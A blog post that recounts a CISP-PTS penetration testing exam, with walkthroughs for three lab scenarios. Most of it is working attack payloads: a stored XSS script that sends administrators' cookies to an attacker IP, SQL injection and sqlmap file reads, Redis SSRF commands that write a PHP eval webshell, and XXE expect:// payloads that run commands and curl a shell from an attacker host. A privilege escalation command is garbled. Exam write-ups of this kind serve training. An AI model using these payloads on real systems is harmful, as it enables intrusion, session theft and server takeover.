banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

cisp-pts exam records

The exam for pts took less than half a month from registration to the test. If you have a foundation in practicing questions, it's quite easy to pass, because many questions are basically the same as the training materials. However, there are some questions that the training institutions also don't know. For example, in this exam, the last major question had the service inside as nacos, and nacos has no exp. I tried common weak passwords, but couldn't get in, so I didn't attempt it. Most of the questions only had 2 keys (20 points), and if you ensured that all the previous keys were obtained, you would already have 80 points. As long as you have more than 70 points, you pass.

Let me talk about the questions I encountered in the exam.

Scenario 1#

xss+sqli+file reading, quite simple

For xss, you need to use Python to start a web service on the attacking machine, then insert the payload. Here, it utilizes a stored XSS vulnerability to write the payload and obtain the administrator's cookie.

<script>document.write('<img src="http://ip:1234/?cookie='+document.cookie+'" />')</script>

Obtained the administrator's cookie.

Through the browser right-click Page - Inspect, select Application, find Storage - Cookies, and replace it with the administrator's cookie.

Pasted image 20241028150907

sqli payload

http://ip:3603/admin/edit.php?id=12312/**/UniOn/**/SeLEct/**/1,2,load_file("/var/key2"),4#

Or run sqlmap

http://IP:3603/admin/edit.php?id=11 (GET)  
# sqlmap.py -u http://10.52.0.29:3603/admin/edit.php?id=11 --cookie=PHPSESSID=732ece3c4dcdba588d48593d689bf927 --dbms mysql --file-read /var/key2

Arbitrary file reading

http://IP:3603/admin/setting.php?page=/tmp/key3

Scenario 2#

ssrf+redis getshell

ssrf: Directory scan robots.txt, download backup.zip, unzip to get a txt file, which will provide a web port. Input http://localhost:1234 in the search box provided by the question to obtain the first key.

redis getshell:

Write webshell

dict://localhost:6379/flushall
dict://localhost:6379/set:1:'<?php eval($_POST[1]);?>'
dict://localhost:6379/config:set:dir:/var/www/html/app1
dict://localhost:6379/config:set:dbfilename:a.php
dict://localhost:6379/save

Write private key

Pasted image 20241028151536

Obtained the second key, the third key is in the task schedule.

Scenario 3#

An xxe vulnerability

Write webshell using expect, expect can execute commands, by starting a web service on the attacking machine and using curl to request.

Execute command

<?xml version="1.0"?><!DOCTYPE a[<!ENTITY b SYSTEM "expect://id">]><p>&b;</p>

Write shell

<?xml version="1.0"?><!DOCTYPE a[<!ENTITY b SYSTEM "expect://curl$IFS$9-O$IFS$9'192.168.80.48:8088/shell.php'">]><p>&b;</p>

Privilege escalation

find / -perm -u=s -type f 2>/dev/null
find 1 -exec 1s /root \;
Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.